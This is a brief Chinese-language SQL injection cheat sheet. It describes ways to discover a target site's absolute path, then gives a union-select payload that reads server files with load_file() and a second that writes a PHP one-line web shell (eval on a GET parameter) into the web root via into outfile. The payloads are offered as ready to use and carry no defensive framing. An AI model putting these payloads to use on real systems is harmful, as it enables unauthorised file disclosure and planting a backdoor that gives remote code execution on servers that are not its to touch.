文件读取使用load_file()函数:
使用之前我们需要先找到网站的绝对路径。(获取办法:报错显示、谷歌语法、site:目标网站 warning、遗留文件如phpinfo、漏洞爆出路径、读取配置文件)
注意路径符号:错误“\” 正确"\\" 正确"/"。如果将路径转换为16进制就可以不用引号。
举例:
union select 1,load_file(“c:/inetpub/wwwroot/index.php”),3
文件写入使用into outfile函数:
使用办法如下:
union select 1,"<?php @eval($_GET[x]);?>",3,4,5 into outfile 'C:/Inetpub/wwwroot/cc.php'